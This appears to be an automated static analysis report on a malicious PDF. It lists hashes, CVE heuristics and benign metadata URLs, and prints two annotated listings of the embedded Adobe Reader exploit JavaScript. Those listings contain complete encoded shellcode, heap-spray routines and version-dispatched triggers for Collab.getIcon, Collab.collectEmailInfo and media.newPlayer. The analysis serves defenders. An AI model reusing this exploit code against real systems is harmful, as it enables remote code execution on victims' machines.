Malicious PDF — malware analysis report

Static analysis result for SHA-256 a78c6c82877472ab…

MALICIOUS

PDF

57.8 KB · Created: 2009-07-08 10:53:46 +08:00 · Authoring application: Acrobat Distiller 7.0 (Windows) · First seen: 2026-05-11. The creation time and authoring application are document-supplied metadata (PDF Info/XMP fields) that the author can set to anything; do not use them for dating or attribution without corroborating evidence.
MD5: b5eaf29bc0e17be71163d2af5cafb5af SHA-1: d265cfeb33f78a7edeef85113452f1de13b885e1 SHA-256: a78c6c82877472abc73bc6c3e7189ae6e43f2da48bb86d226658263d2070cc2e
330 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 0.9997

Heuristics 9

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (matched in decompressed stream)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (matched in decompressed stream)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file. In this sample the dispatcher at the end of the carved script selects media.newPlayer (bracketed by util.printd calls) for viewerVersion > 9.0, Collab.getIcon for 8.0–9.0 and Collab.collectEmailInfo below 8.0; util.printf does not occur. Note that the collectEmailInfo branch (commonly attributed to CVE-2007-5659) has no CVE-specific heuristic of its own in this report, so the two exact CVE matches above understate the sample's exploit coverage.
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Obfuscated multi-stage PDF JavaScript heap-spray exploit critical CVE related PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAY
    PDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism. Caveat for this sample: the layering visible in the carved preview consists of hex-escaped property names (e.g. util["\x70\x72\x69n\x74\x64"] for printd) and "%u" escapes split into "\x25\x75" literals; no in-JS XOR stager or ROP chain is visible in the preview, so read the heap-spray/ROP wording as the rule's general description rather than a confirmed property of this file.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    All six URLs are XMP/RDF schema namespace identifiers (W3C RDF syntax, Adobe PDF/XAP/XMP-MM/PDFX, Dublin Core) that appear only in the document's metadata text, not in the carved JavaScript; they are not contact points and should not be treated as network indicators.
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# — in PDF document text
    • http://ns.adobe.com/pdf/1.3/ — in PDF document text
    • http://ns.adobe.com/xap/1.0/ — in PDF document text
    • http://purl.org/dc/elements/1.1/ — in PDF document text
    • http://ns.adobe.com/xap/1.0/mm/ — in PDF document text
    • http://ns.adobe.com/pdfx/1.3/ — in PDF document text

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0017_000.js | pdf-javascript-stream | PDF /JS object 17 at offset 0x4DA | 5390 bytes
SHA-256: 950a4aa38d32c2c44e0b10e1a6ca71e82f62814d662fa32bb41d4e2065edfe0f
Detection
ClamAV: No threats found (on the carved script only; the MALICIOUS verdict above rests on the heuristic and ML results, not on signature AV)
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script (the carved script is far shorter than that, so the preview below is the complete artifact)
// Alias for the built-in unescape(); used throughout to turn "%uXXXX" strings
// into raw 16-bit code units (shellcode and heap-spray patterns).
var unes=unescape;
// rep(count, what): returns `what` concatenated `count` times ("" when count <= 0).
// Used to build the padding runs that surround the shellcode in every branch.
function rep(count,what){
          var v="";
          while(--count>=0) v+=what;
          return v;
}
// myunes(buf): decodes a plain hex string two characters at a time through
// util.byteToChar. The property names are hex-escaped ("length", "byteToChar",
// "substr") to hide the Acrobat API names from naive string matching.
// Called from exp() to build the 0x0a filler passed to Collab.getIcon.
function myunes(buf){
          var ret='';
          for (var x=0;x<buf["\x6c\x65\x6e\x67\x74\x68"];x+=2){
                  ret+=util["\x62\x79\x74e\x54\x6f\x43\x68\x61\x72"](Number('0x'+buf["\x73\x75\x62\x73\x74\x72"](x,2)));//
          }
          return ret;
}
// Shellcode buffer. `sc` is declared without a value, so the 18000-iteration
// loop below does numeric additions on undefined (yielding NaN) whose result is
// discarded by the reassignment that follows; it reads as filler / emulator
// time-wasting code — confirm.
var sc;
for(i=0;i<18000;i++)
sc=sc+0x60;
// Each "%uXXXX" is a little-endian 16-bit unit; some pieces are written as
// "\x25\x75XXXX" (the same "%u" escape split into \x literals) and the literal
// is split across 28 concatenated strings to defeat simple "%u" pattern scans.
// The leading bytes (41 43 49 4B EB 11 FC 5B 4B 33 C9 66 B9 B0 01 80 34 0B F9
// E2 FA EB 05 E8 EB FF FF FF) look like a call/pop XOR-decoder stub with key
// 0xF9 over 0x1B0 bytes; the many F9F9 words would then be encoded zero bytes.
// Verify in a disassembler before relying on that reading.
sc=unes("%u4341%u4b49%u11EB%u5BFC%u334B%u66C9%ub0B9%u8001%u0B34%uE2f9"+
"\x25\x75EBFA\x25\x75E805\x25\x75FFEB\x25\x75FFFF\x25\x75F911\x25\x75F9F9\x25\x75A3F9\x25\x7572AC\x25\x757815\x25\x759D15\x25\x75F9FD\x25\x7572F9"+
"%u110D%uF869%uF9F9%u0172%u1611%uF9F9%u70F9%u06FF"+
"%u91CF%u6254%u2684%uED11%uF9F8%u70F9%uF5BF%uCF06"+
"%uD091%u3FEB%u11AF%uF8FC%uF9F9%uBF70%u06E9%u91CF"+
"%uC5A0%u82FE%u0F11%uF9F9%u70F9%uEDBF%uCF06%u8791"+
"%u1B21%u118A%uF91E%uF9F9%uBF70%uCACD%u1230%u72FA"+
"%uC5B7%u387A%uA8FD%uF993%u06A8%uF5AF%u7AA0%u0601"+
"%u098D%uB9C4%uF9E6%u8FF9%u7010%uC5B7%uF993%uF993"+
"%uF993%uFB93%uF993%u8F06%u06C5%uE9AF%uBF70%u7ABD"+
"%uF901%u328D%uF993%uF993%uF993%uFD93%u8F06%u06BD"+
"%uEDAF%uBF70%u7AB1%uF901%u4C8D%uC178%uA9DC%uBFBD"+
"%uB772%u8CC5%u7854%uF941%uF9EB%uA9F9%uA99D%u8CBD"+
"%u7858%uFD41%uF9EB%u16F9%u1307%u8C57%u406C%uFFF9"+
"%uF9F9%u1578%uF1F9%uF9F9%uAEAF%u0972%u3F78%uEBE9"+
"%uF9F9%u3D72%u397A%u72F1%u0A01%u405D%uFFF9%uF9F9"+
"%uB0B0%uB0B0%uCD78%u17F1%u0707%u7C16%u8C30%uA608"+
"%u06A7%uC58F%u8F06%u06B1%uBD8F%u1906%uAFAC%u589D"+
"%uF9C9%uF9F9%u397C%uEA81%u72C7%uF5B9%u72C7%uE589"+
"%u72C7%uF1A7%uC754%u9172%u12F1%uC7F4%uB972%uC7CD"+
"%u5172%uF941%uF9F9%u22CA%u3C72%uA4A7%uFD3B%uAAF9"+
"%uAFAC%uCFAE%u9572%uE1DD%u72CF%uC5BC%u72CF%uFCAD"+
"%uFA81%uC72C%uB372%uC7E1%uA372%uFAD9%u1A24%uB0C5"+
"%u72C7%u72CD%u0CFA%u06CA%uCA05%u5539%u3DC3%uFE8D"+
"%u3638%uFAF4%u1201%uCF0B%u85C2%uEDDD%u268C%u3B72"+
"%u397A%uC7DD%uE172%u24FA%uC79F%uF572%uC7B2%uA372"+
"\x25\x75FAE5\x25\x75C724\x25\x75FD72\x25\x75FA72\x25\x75123C\x25\x75CAFB\x25\x757239\x25\x75A62C"+
"%uA4A7%u3BA2%uF9F1%uF911%uF9F9%uA1F9%u397A%u3AFC");
// exp(): the Collab.getIcon path (matched by the CVE-2009-0927 heuristic above).
// Reached from the dispatcher when 8.0 <= app.viewerVersion <= 9.0. blah, bbk,
// wap, fillbk, bk, mm and of are assigned without `var` and become globals.
function exp() {
	var sc1="";
	// blah: 128 x ten 0x42 bytes ("BBBB...") followed by the shellcode `sc`.
	blah=rep(128,unes("%u4242%u4242%u4242%u4242%u4242"))+sc1+sc;
	// Grow a 0x42 filler by doubling until it is at least blah.length+20 code
	// units (["\x6c..."] is "length", ["\x73..."] is "substring"), then grow
	// bk until bk.length + wap reaches 0x40000 code units.
	bbk=unes("%u4242%u4242");
	wap=20+blah["\x6c\x65\x6e\x67\x74\x68"]
	while(bbk["\x6c\x65\x6e\x67\x74\x68"]<wap) bbk+=bbk;
	fillbk=bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0,wap);
	bk=bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0,bbk["\x6c\x65\x6e\x67\x74\x68"]-wap);
	while(bk["\x6c\x65\x6e\x67\x74\x68"]+wap<0x40000) bk=bk+bk+fillbk;
	// Heap spray: 200 strings of filler + shellcode.
	mm=new Array();
	for(i=0;i<200;i++) mm[i]=bk+blah;
	// Trigger argument: 4096 x 4 bytes of 0x0a (built via util.byteToChar in
	// myunes) followed by the hex-escaped string "_N.bundle"; the hex-escaped
	// key on the last line is "getIcon".
	of=rep(4096,myunes("0a0a0a0a"));
	var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65"];//next time
	Collab["g\x65t\x49\x63\x6f\x6e"](of+a[0x0]);
}
// start(): the Collab.collectEmailInfo path. The dispatcher only calls it when
// app.viewerVersion < 8.0, so the >= 7.0 branch covers 7.x and the else branch
// earlier versions. No heuristic above assigns a CVE to this sink (commonly
// attributed to CVE-2007-5659 — confirm against the rule set). plin and ef6 are
// assigned without `var` and become globals.
function start() 
{
	if(app.viewerVersion>=7.0)
	{
		// 7.x buffer: 1124 and 122 repeats of an 8-byte unit around one 8-byte and one 4-byte word, the shellcode, then 1256 x a 4-byte trailer.
		plin=rep(1124,unes("%u0b0b%u0028%u06eb%u06eb"))+unes("%u0b0b%u0028%u0aeb%u0aeb")+unes("%u4346%u4a4b")+rep(122,unes("%u0b0b%u0028%u06eb%u06eb"))+sc+rep(1256,unes("%u4a4b%u4748"));
	} 
	else
	{
		// Pre-7 buffer: 80 x "AAAA", the shellcode, 80 x a 4-byte pattern, two
		// 4-byte words, left-padded with "%u4141" (written "\x25\x754141") to a
		// multiple of 8 code units, then 2626 copies of ef6.
		ef6=unes("%uf6eb%uf6eb")+unes("%u0b0b%u0019");
		plin=rep(80,unes("\x25\x754141\x25\x754141"))+sc+rep(80,unes("\x25\x754241\x25\x754142"))+unes("\x25\x75f7e9\x25\x75fff9")+unes("\x25\x75ffff\x25\x75ffff");
		while((plin.length%8)!=0) 
			plin=unes("\x25\x754141")+plin;
		plin+=rep(2626,ef6);
	}
	if (app.viewerVersion>=6.0)
	{
		// Sink: the hex-escaped key is "collectEmailInfo"; the oversized msg carries the shellcode-bearing buffer.
		Collab["c\x6fll\x65\x63\x74\x45\x6d\x61\x69\x6c\x49\x6e\x66\x6f"]({subj:0,msg:plin});
	}
}
// Per-version dispatcher (the "Pidief-style" structure flagged by the report).
if(app.viewerVersion>9.0){
	// Reader > 9.0: media.newPlayer path (CVE-2009-4324 heuristic).
	// The 18000-iteration loop adds 0x77 to an undefined variable (NaN); its
	// result is discarded by the re-declaration further down — reads as filler, confirm.
	var QVGaOwzwDZKwxGeQpKmiXsRvZHKaDZBUqJOJuDdvKMYnhGLNNjxscBfBbPYjsjrScRhbRxrUToizpIvPMHrMRKcUZVxE;
	for(i=0;i<18000;i++)
	QVGaOwzwDZKwxGeQpKmiXsRvZHKaDZBUqJOJuDdvKMYnhGLNNjxscBfBbPYjsjrScRhbRxrUToizpIvPMHrMRKcUZVxE=QVGaOwzwDZKwxGeQpKmiXsRvZHKaDZBUqJOJuDdvKMYnhGLNNjxscBfBbPYjsjrScRhbRxrUToizpIvPMHrMRKcUZVxE +0x77;
	// Spray pattern "%u0c0c%u0c0c", with "%u" written as "\x25\x75".
	var AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc = unes("\x25\x750\x630\x63\x25\x750\x630\x63");
	// Re-declared as 8 x "%u0c0c" followed by a run of printable ASCII letters; passed to util.printd below.
	var QVGaOwzwDZKwxGeQpKmiXsRvZHKaDZBUqJOJuDdvKMYnhGLNNjxscBfBbPYjsjrScRhbRxrUToizpIvPMHrMRKcUZVxE = unes("\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c%u5a51%u4874%u5961%u6b71%u4772%u6a47%u4a73%u6247%u654b%u734b%u4858%u6371%u717a%u7672%u626e%u626e%u455a%u4243%u6764%u7646%u696b%u6a6e%u4e61%u6c6d%u7350%u5168%u7171%u5574");
	// Double the 0x0c0c pattern past 32768 code units, then trim it so that pattern + sc is exactly 32768.
	while(AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc.length <= 32768) AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc+=AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc;
		AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc=AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc.substring(0,32768 - sc.length);
	// Heap spray: 0x2000 (8192) strings of pattern + shellcode (aa is an implicit global).
	aa=new Array();
	for(i=0;i<0x2000;i++) {
		aa[i]= AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc + sc;
	}
	// util.printd (hex-escaped key) is called twice, then media.newPlayer(null)
	// (hex-escaped key) inside an empty try/catch, then printd again with the
	// 0x0c0c buffer. This matches the public CVE-2009-4324 use-after-free
	// pattern, where the printd calls appear to shape the heap around the freed
	// player object — verify dynamically rather than from this listing.
	util["\x70\x72\x69n\x74\x64"]("FGgITeSFZAjpOsSyXgoMbUZttCRxNEDbuZjH", new Date());
	util["\x70\x72\x69n\x74\x64"]("PAAhBAPMqrBpJVqRwqwcuxjWkEUEcZdEnvdP", new Date());
	try
	{//comment
	this.media["\x6e\x65\x77\x50\x6c\x61\x79\x65\x72"](null);
	}///akak
	catch(e)
	{
	}
	util["\x70\x72\x69n\x74\x64"](QVGaOwzwDZKwxGeQpKmiXsRvZHKaDZBUqJOJuDdvKMYnhGLNNjxscBfBbPYjsjrScRhbRxrUToizpIvPMHrMRKcUZVxE, new Date());
}else if(app.viewerVersion>=8.0){
	// Reader 8.0-9.0: Collab.getIcon path. `this.external` is read as an
	// in-browser indicator; when set, exp() is deferred 1200 ms through a
	// string-evaluated timer, otherwise it runs immediately.
	var inBrowser=this.external;
	if (inBrowser)
		var shaft=app.setTimeOut("exp()",1200);
	else
		exp();
}
else{
	// Reader < 8.0: Collab.collectEmailInfo path, always deferred 1200 ms.
	var shaft=app.setTimeOut("start()",1200);
}
generic_stage_recovery_000.js | deobfuscated-js | generic stage recovery (split-literal-normalize) from JavaScript object 17 at offset 0x4DA | 5135 bytes. Note the normalization is partial: only the concatenated shellcode literal was joined and its "\x25\x75" escapes rewritten to "%u"; the same escapes in start() and the > 9.0 branch, and every hex-escaped property name, are left as-is, so this artifact is only marginally more readable than the raw stream.
SHA-256: 3ad7ca1fada560eeb0bb07c26ce24fe428891d653e51d022916dd7c38ae0976b
Detection
ClamAV: No threats found (on the recovered script only; the MALICIOUS verdict above rests on the heuristic and ML results, not on signature AV)
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script (the recovered script is far shorter than that, so the preview below is the complete artifact)
// Alias for the built-in unescape(); used throughout to turn "%uXXXX" strings
// into raw 16-bit code units (shellcode and heap-spray patterns).
var unes=unescape;
// rep(count, what): returns `what` concatenated `count` times ("" when count <= 0).
// Used to build the padding runs that surround the shellcode in every branch.
function rep(count,what){
          var v="";
          while(--count>=0) v+=what;
          return v;
}
// myunes(buf): decodes a plain hex string two characters at a time through
// util.byteToChar. The property names are hex-escaped ("length", "byteToChar",
// "substr") to hide the Acrobat API names from naive string matching.
// Called from exp() to build the 0x0a filler passed to Collab.getIcon.
function myunes(buf){
          var ret='';
          for (var x=0;x<buf["\x6c\x65\x6e\x67\x74\x68"];x+=2){
                  ret+=util["\x62\x79\x74e\x54\x6f\x43\x68\x61\x72"](Number('0x'+buf["\x73\x75\x62\x73\x74\x72"](x,2)));//
          }
          return ret;
}
// Shellcode buffer. `sc` is declared without a value, so the 18000-iteration
// loop below does numeric additions on undefined (yielding NaN) whose result is
// discarded by the reassignment that follows; it reads as filler / emulator
// time-wasting code — confirm.
var sc;
for(i=0;i<18000;i++)
sc=sc+0x60;
// Each "%uXXXX" is a little-endian 16-bit unit. In the raw stream this literal
// was split into 28 concatenated pieces with some "%u" written as "\x25\x75";
// the stage recovery joined and normalized them here. The leading bytes
// (41 43 49 4B EB 11 FC 5B 4B 33 C9 66 B9 B0 01 80 34 0B F9 E2 FA EB 05 E8 EB
// FF FF FF) look like a call/pop XOR-decoder stub with key 0xF9 over 0x1B0
// bytes; the many F9F9 words would then be encoded zero bytes. Verify in a
// disassembler before relying on that reading.
sc=unes("%u4341%u4b49%u11EB%u5BFC%u334B%u66C9%ub0B9%u8001%u0B34%uE2f9%uEBFA%uE805%uFFEB%uFFFF%uF911%uF9F9%uA3F9%u72AC%u7815%u9D15%uF9FD%u72F9%u110D%uF869%uF9F9%u0172%u1611%uF9F9%u70F9%u06FF%u91CF%u6254%u2684%uED11%uF9F8%u70F9%uF5BF%uCF06%uD091%u3FEB%u11AF%uF8FC%uF9F9%uBF70%u06E9%u91CF%uC5A0%u82FE%u0F11%uF9F9%u70F9%uEDBF%uCF06%u8791%u1B21%u118A%uF91E%uF9F9%uBF70%uCACD%u1230%u72FA%uC5B7%u387A%uA8FD%uF993%u06A8%uF5AF%u7AA0%u0601%u098D%uB9C4%uF9E6%u8FF9%u7010%uC5B7%uF993%uF993%uF993%uFB93%uF993%u8F06%u06C5%uE9AF%uBF70%u7ABD%uF901%u328D%uF993%uF993%uF993%uFD93%u8F06%u06BD%uEDAF%uBF70%u7AB1%uF901%u4C8D%uC178%uA9DC%uBFBD%uB772%u8CC5%u7854%uF941%uF9EB%uA9F9%uA99D%u8CBD%u7858%uFD41%uF9EB%u16F9%u1307%u8C57%u406C%uFFF9%uF9F9%u1578%uF1F9%uF9F9%uAEAF%u0972%u3F78%uEBE9%uF9F9%u3D72%u397A%u72F1%u0A01%u405D%uFFF9%uF9F9%uB0B0%uB0B0%uCD78%u17F1%u0707%u7C16%u8C30%uA608%u06A7%uC58F%u8F06%u06B1%uBD8F%u1906%uAFAC%u589D%uF9C9%uF9F9%u397C%uEA81%u72C7%uF5B9%u72C7%uE589%u72C7%uF1A7%uC754%u9172%u12F1%uC7F4%uB972%uC7CD%u5172%uF941%uF9F9%u22CA%u3C72%uA4A7%uFD3B%uAAF9%uAFAC%uCFAE%u9572%uE1DD%u72CF%uC5BC%u72CF%uFCAD%uFA81%uC72C%uB372%uC7E1%uA372%uFAD9%u1A24%uB0C5%u72C7%u72CD%u0CFA%u06CA%uCA05%u5539%u3DC3%uFE8D%u3638%uFAF4%u1201%uCF0B%u85C2%uEDDD%u268C%u3B72%u397A%uC7DD%uE172%u24FA%uC79F%uF572%uC7B2%uA372%uFAE5%uC724%uFD72%uFA72%u123C%uCAFB%u7239%uA62C%uA4A7%u3BA2%uF9F1%uF911%uF9F9%uA1F9%u397A%u3AFC");
// exp(): the Collab.getIcon path (matched by the CVE-2009-0927 heuristic above).
// Reached from the dispatcher when 8.0 <= app.viewerVersion <= 9.0. blah, bbk,
// wap, fillbk, bk, mm and of are assigned without `var` and become globals.
function exp() {
	var sc1="";
	// blah: 128 x ten 0x42 bytes ("BBBB...") followed by the shellcode `sc`.
	blah=rep(128,unes("%u4242%u4242%u4242%u4242%u4242"))+sc1+sc;
	// Grow a 0x42 filler by doubling until it is at least blah.length+20 code
	// units (["\x6c..."] is "length", ["\x73..."] is "substring"), then grow
	// bk until bk.length + wap reaches 0x40000 code units.
	bbk=unes("%u4242%u4242");
	wap=20+blah["\x6c\x65\x6e\x67\x74\x68"]
	while(bbk["\x6c\x65\x6e\x67\x74\x68"]<wap) bbk+=bbk;
	fillbk=bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0,wap);
	bk=bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0,bbk["\x6c\x65\x6e\x67\x74\x68"]-wap);
	while(bk["\x6c\x65\x6e\x67\x74\x68"]+wap<0x40000) bk=bk+bk+fillbk;
	// Heap spray: 200 strings of filler + shellcode.
	mm=new Array();
	for(i=0;i<200;i++) mm[i]=bk+blah;
	// Trigger argument: 4096 x 4 bytes of 0x0a (built via util.byteToChar in
	// myunes) followed by the hex-escaped string "_N.bundle"; the hex-escaped
	// key on the last line is "getIcon".
	of=rep(4096,myunes("0a0a0a0a"));
	var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65"];//next time
	Collab["g\x65t\x49\x63\x6f\x6e"](of+a[0x0]);
}
// start(): the Collab.collectEmailInfo path. The dispatcher only calls it when
// app.viewerVersion < 8.0, so the >= 7.0 branch covers 7.x and the else branch
// earlier versions. No heuristic above assigns a CVE to this sink (commonly
// attributed to CVE-2007-5659 — confirm against the rule set). plin and ef6 are
// assigned without `var` and become globals. The "\x25\x75" escapes ("%u")
// were not normalized by the stage recovery in this function.
function start() 
{
	if(app.viewerVersion>=7.0)
	{
		// 7.x buffer: 1124 and 122 repeats of an 8-byte unit around one 8-byte and one 4-byte word, the shellcode, then 1256 x a 4-byte trailer.
		plin=rep(1124,unes("%u0b0b%u0028%u06eb%u06eb"))+unes("%u0b0b%u0028%u0aeb%u0aeb")+unes("%u4346%u4a4b")+rep(122,unes("%u0b0b%u0028%u06eb%u06eb"))+sc+rep(1256,unes("%u4a4b%u4748"));
	} 
	else
	{
		// Pre-7 buffer: 80 x "AAAA", the shellcode, 80 x a 4-byte pattern, two
		// 4-byte words, left-padded with "%u4141" (written "\x25\x754141") to a
		// multiple of 8 code units, then 2626 copies of ef6.
		ef6=unes("%uf6eb%uf6eb")+unes("%u0b0b%u0019");
		plin=rep(80,unes("\x25\x754141\x25\x754141"))+sc+rep(80,unes("\x25\x754241\x25\x754142"))+unes("\x25\x75f7e9\x25\x75fff9")+unes("\x25\x75ffff\x25\x75ffff");
		while((plin.length%8)!=0) 
			plin=unes("\x25\x754141")+plin;
		plin+=rep(2626,ef6);
	}
	if (app.viewerVersion>=6.0)
	{
		// Sink: the hex-escaped key is "collectEmailInfo"; the oversized msg carries the shellcode-bearing buffer.
		Collab["c\x6fll\x65\x63\x74\x45\x6d\x61\x69\x6c\x49\x6e\x66\x6f"]({subj:0,msg:plin});
	}
}
// Per-version dispatcher (the "Pidief-style" structure flagged by the report).
if(app.viewerVersion>9.0){
	// Reader > 9.0: media.newPlayer path (CVE-2009-4324 heuristic).
	// The 18000-iteration loop adds 0x77 to an undefined variable (NaN); its
	// result is discarded by the re-declaration further down — reads as filler, confirm.
	var QVGaOwzwDZKwxGeQpKmiXsRvZHKaDZBUqJOJuDdvKMYnhGLNNjxscBfBbPYjsjrScRhbRxrUToizpIvPMHrMRKcUZVxE;
	for(i=0;i<18000;i++)
	QVGaOwzwDZKwxGeQpKmiXsRvZHKaDZBUqJOJuDdvKMYnhGLNNjxscBfBbPYjsjrScRhbRxrUToizpIvPMHrMRKcUZVxE=QVGaOwzwDZKwxGeQpKmiXsRvZHKaDZBUqJOJuDdvKMYnhGLNNjxscBfBbPYjsjrScRhbRxrUToizpIvPMHrMRKcUZVxE +0x77;
	// Spray pattern "%u0c0c%u0c0c", with "%u" written as "\x25\x75" (not normalized by the stage recovery).
	var AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc = unes("\x25\x750\x630\x63\x25\x750\x630\x63");
	// Re-declared as 8 x "%u0c0c" followed by a run of printable ASCII letters; passed to util.printd below.
	var QVGaOwzwDZKwxGeQpKmiXsRvZHKaDZBUqJOJuDdvKMYnhGLNNjxscBfBbPYjsjrScRhbRxrUToizpIvPMHrMRKcUZVxE = unes("\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c%u5a51%u4874%u5961%u6b71%u4772%u6a47%u4a73%u6247%u654b%u734b%u4858%u6371%u717a%u7672%u626e%u626e%u455a%u4243%u6764%u7646%u696b%u6a6e%u4e61%u6c6d%u7350%u5168%u7171%u5574");
	// Double the 0x0c0c pattern past 32768 code units, then trim it so that pattern + sc is exactly 32768.
	while(AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc.length <= 32768) AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc+=AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc;
		AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc=AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc.substring(0,32768 - sc.length);
	// Heap spray: 0x2000 (8192) strings of pattern + shellcode (aa is an implicit global).
	aa=new Array();
	for(i=0;i<0x2000;i++) {
		aa[i]= AKjtQExdzrASxZtHTFMSwNZfztONMZPULUqwGGdUSJSLxByMJtOdErPceyqDZbc + sc;
	}
	// util.printd (hex-escaped key) is called twice, then media.newPlayer(null)
	// (hex-escaped key) inside an empty try/catch, then printd again with the
	// 0x0c0c buffer. This matches the public CVE-2009-4324 use-after-free
	// pattern, where the printd calls appear to shape the heap around the freed
	// player object — verify dynamically rather than from this listing.
	util["\x70\x72\x69n\x74\x64"]("FGgITeSFZAjpOsSyXgoMbUZttCRxNEDbuZjH", new Date());
	util["\x70\x72\x69n\x74\x64"]("PAAhBAPMqrBpJVqRwqwcuxjWkEUEcZdEnvdP", new Date());
	try
	{//comment
	this.media["\x6e\x65\x77\x50\x6c\x61\x79\x65\x72"](null);
	}///akak
	catch(e)
	{
	}
	util["\x70\x72\x69n\x74\x64"](QVGaOwzwDZKwxGeQpKmiXsRvZHKaDZBUqJOJuDdvKMYnhGLNNjxscBfBbPYjsjrScRhbRxrUToizpIvPMHrMRKcUZVxE, new Date());
}else if(app.viewerVersion>=8.0){
	// Reader 8.0-9.0: Collab.getIcon path. `this.external` is read as an
	// in-browser indicator; when set, exp() is deferred 1200 ms through a
	// string-evaluated timer, otherwise it runs immediately.
	var inBrowser=this.external;
	if (inBrowser)
		var shaft=app.setTimeOut("exp()",1200);
	else
		exp();
}
else{
	// Reader < 8.0: Collab.collectEmailInfo path, always deferred 1200 ms.
	var shaft=app.setTimeOut("start()",1200);
}